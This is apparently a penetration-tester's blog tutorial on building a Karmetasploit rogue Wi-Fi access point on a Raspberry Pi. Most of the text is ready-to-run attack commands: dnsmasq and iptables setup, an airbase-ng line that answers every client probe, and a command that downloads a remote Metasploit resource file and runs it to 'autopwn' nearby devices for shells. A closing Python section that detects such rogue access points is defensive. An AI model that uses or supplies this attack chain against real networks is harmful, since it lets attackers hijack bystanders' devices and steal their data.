Auto-Compromising Devices with Karmetasploit

March 21, 2016


For years, I've found that penetrating corporate environments through mobile devices is much easier than attacking border-edge firewalls and hardened servers. For this reason, I've begun using kits such as Karmetasploit. Combining a Raspberry Pi with Metasploit gives you instant shells and the ability to pillage data, using nothing more than a Raspberry Pi, an Alfa antenna and an internet connection.

Here's how you do it...

Install Raspbian on a Pi 2 or greater. When complete, apply all the available updates (each command needs sudo, not just the first one):

sudo apt-get update && sudo apt-get -y upgrade && sudo apt-get -y install vim

Next, install dnsmasq.  This will be used for DNS resolution and DHCP address handouts:

sudo apt-get -y install dnsmasq

 

Once it's installed, configure dnsmasq by editing its config file:

sudo vi /etc/dnsmasq.conf

Update it to include the following at the top. The lines starting with # are comments; the interface= and dhcp-range= lines are the settings that take effect:

# If you want dnsmasq to listen for DHCP and DNS requests only on specified interfaces (and the loopback) give the name of the interface (eg eth0) here.
# Repeat the line for more than one interface.
interface=at0
interface=wlan0mon
interface=wlan0

# Uncomment this to enable the integrated DHCP server. You need to supply the range of addresses available for lease and optionally a lease time. If you have more than one network, you'll need to repeat this for each network on which you want to supply DHCP service.
dhcp-range=10.10.10.50,10.10.10.150,12h

Next, install Aircrack-ng by doing the following:

sudo apt-get -y install aircrack-ng

 

Once this is in place, you'll need to create the proper rules to forward all "hooked" traffic from at0 out through eth0. Run the following from a root shell (sudo -i), since the echo redirect into /proc will not work with a plain sudo prefix:

modprobe iptable_nat
iptables -A FORWARD -i wlan0mon -j ACCEPT
iptables -A FORWARD -i at0 -j ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward

Okay, time to start hooking devices…

Start airbase-ng in a mode that advertises a default SSID but will also respond to every probe request it hears (wlan0mon is the monitor-mode interface that airmon-ng creates from wlan0). Issue the following command. It will also create a new interface named at0:

airbase-ng -P -C 30 -e "linksys" -v wlan0mon

 

If done properly, you'll see something similar:

[Screenshot: airbase-ng output]

Open a second terminal window, issue the following to configure the interface on at0:

ifconfig at0 up 10.10.10.1 netmask 255.255.255.0

 

Restart dnsmasq:

service dnsmasq restart

 

Finally, begin autopwning devices by issuing the following command:

cd /opt && wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt && msfconsole -q -r /opt/karma.rc_.txt

 

If done properly, you should see the following:

[Screenshot: msfconsole running karma.rc]

You can confirm this by connecting a test device to any previously accepted WiFi networks and opening a browser. It should reveal the following:

[Screenshot: browser view from the test device]

 

When successful, shells will be returned into the second console window that should be running Karmetasploit.
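From the defensive side, the airbase-ng -P behaviour used above has a clear signature: one BSSID answers probe requests for many unrelated SSIDs, and it may answer for your corporate SSID without being one of your access points. The following Python is an added example, not code from the original post, that flags both patterns in a list of observed probe responses; the frame records, the "CorpWifi" SSID and the BSSID allowlist are constructed for illustration.

```python
from collections import defaultdict

# Constructed sample of observed 802.11 probe responses as (bssid, ssid) pairs.
# In practice these would come from a monitor-mode capture parsed elsewhere.
SAMPLE_PROBE_RESPONSES = [
    ("00:11:22:33:44:55", "linksys"),      # same BSSID answering for...
    ("00:11:22:33:44:55", "CorpWifi"),     # ...every SSID clients probe for
    ("00:11:22:33:44:55", "Starbucks"),
    ("00:11:22:33:44:55", "HomeNet-5G"),
    ("AA:BB:CC:DD:EE:FF", "CorpWifi"),     # a legitimate corporate AP
    ("AA:BB:CC:DD:EE:FF", "CorpWifi-Guest"),
]

# Constructed allowlist: SSID -> set of BSSIDs authorised to serve it.
AUTHORIZED_BSSIDS = {
    "CorpWifi": {"aa:bb:cc:dd:ee:ff"},
    "CorpWifi-Guest": {"aa:bb:cc:dd:ee:ff"},
}


def ssids_per_bssid(frames):
    """Group the distinct SSIDs each BSSID has answered a probe for."""
    seen = defaultdict(set)
    for bssid, ssid in frames:
        seen[bssid.lower()].add(ssid)
    return seen


def find_karma_candidates(frames, threshold=3):
    """BSSIDs answering probes for at least `threshold` distinct SSIDs.

    A real AP only answers for the SSIDs it serves, so a single BSSID
    replying to many unrelated names is the karma-style rogue-AP signature.
    """
    return {bssid: sorted(ssids)
            for bssid, ssids in ssids_per_bssid(frames).items()
            if len(ssids) >= threshold}


def find_unauthorized_responders(frames, authorized):
    """SSID -> BSSIDs that answered for a protected SSID but are not allowlisted."""
    rogue = defaultdict(set)
    for bssid, ssid in frames:
        if ssid in authorized and bssid.lower() not in authorized[ssid]:
            rogue[ssid].add(bssid.lower())
    return {ssid: sorted(bssids) for ssid, bssids in rogue.items()}


if __name__ == "__main__":
    print("karma candidates:", find_karma_candidates(SAMPLE_PROBE_RESPONSES))
    print("unauthorised:", find_unauthorized_responders(SAMPLE_PROBE_RESPONSES, AUTHORIZED_BSSIDS))
```

Either hit is a reason to locate the radio physically; wireless IDS products implement the same heuristics on live captures.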

 

Good luck!
